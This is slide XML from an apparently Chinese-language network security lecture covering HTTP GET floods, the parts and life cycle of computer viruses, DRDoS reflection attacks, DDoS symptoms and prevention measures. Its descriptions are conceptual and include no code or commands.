              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197660" name="Text Box 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0F77CA-8D87-4A3B-8006-45D3C1C7B616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4037013" y="6126163"/>
            <a:ext cx="165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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(DB Server)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197661" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9323B9-84EF-4028-8CEB-60BD1261A734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3376613" y="4964113"/>
            <a:ext cx="76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en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>连接池</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用完啦！！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20524" name="Text Box 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3CD68B-9600-4551-9A5E-8B02B0D087AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4414838" y="4619625"/>
            <a:ext cx="1017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en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>连接池</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197663" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFFB7ACD-BD78-4934-90AF-AE862D6FBDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4302125" y="3721100"/>
            <a:ext cx="15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500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>占用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197664" name="Rectangle 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F97763F8-0A91-4DD5-A47C-287D4EA3D0C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4783138" y="3721100"/>
            <a:ext cx="1635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500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>占用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197665" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8BBA9AF-7DF4-4534-8360-F3C44F291621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5275263" y="3721100"/>
            <a:ext cx="187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500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>占用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197666" name="Text Box 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6507CAC2-53BD-49A9-9D34-AF5FD44F4741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="222250" y="5743575"/>
            <a:ext cx="2630488" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="993300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="993300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP Get Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B05030201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p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="204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20488"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20488"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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20497"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20497"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20497"/>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0524"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="20488" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="20524"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7F2871BC-4ABB-4080-848B-6A75C97E54FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（狭义）计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD65FC6-AE18-44E6-B1FC-F727605F48FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>形态：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过修改而达到“感染”其它程序的一段软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实际上，任何形式的可执行内容都可以被感染</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>组成部分：感染机制、触发、载荷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>生命周期：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>休眠阶段（可选）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、传播阶段、触发阶段、执行阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F158EEE8-C938-4636-8ADD-00190D8FEFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="333375"/>
            <a:ext cx="8461375" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DRDOS（分布式反射拒绝服务）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199683" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5A78E9-DA6E-4AB0-B096-06F235CCB33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="1476375"/>
            <a:ext cx="7956550" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3000"/>
              <a:t>DRDoS是英文“Distributed Reflection Denial of Servie ”的缩写，中文意思是“分布式反射拒绝服务”。与DoS、DDoS不同，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>该方式靠的是发送大量带有被害者IP地址的数据包给攻击主机，然后攻击主机对IP地址源做出大量回应，形成拒绝服务攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3000"/>
              <a:t>由于是利用TCP/IP服务的“三次握手”的第二步，因此攻击者无需给被攻击者安装木马，发动DRDoS也只要花费攻击者很少的资源。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{217F35A1-558B-4ED5-B538-F0D9F2330DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="333375"/>
            <a:ext cx="8461375" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DRDOS（分布式反射拒绝服务）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200707" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DCCEB9-CF82-438E-AB9B-2F5786FAE001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="1476375"/>
            <a:ext cx="7956550" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>DRDoS是通过发送带有受害者IP地址的SYN连接请求包给攻击主机BGP，然后在根据TCP三次握手的规则，这些攻击主机BGP会向源IP（受害者IP）发出SYN+ACK包来响应这些请求，造成受害者主机忙于处理这些回应而被拒绝服务攻击。</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50D5EEAB-2D2F-401B-B077-3757C351E776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>	被DDoS攻击时的现象</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201731" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B524FD9-91CD-470B-AE7A-CBCA654EC705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>能瞬间造成对方电脑死机或者假死，有人曾经测试过，攻击不到1秒钟，电脑就已经死机和假死，鼠标图标不动了，系统发出滴滴滴滴的声音。还有CPU使用率高等现象。</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721F4C52-7EB7-40C6-AE58-C4CF5BE1806C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>预防为主的DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S应付方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24F8C57-A5D1-4CC6-B236-BBD3244455D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="1676400"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>定期扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0"/>
              <a:t>要定期扫描现有的网络主节点，清查可能存在的安全漏洞，对新出现的漏洞及时进行清理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>．在骨干节点配置防火墙</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
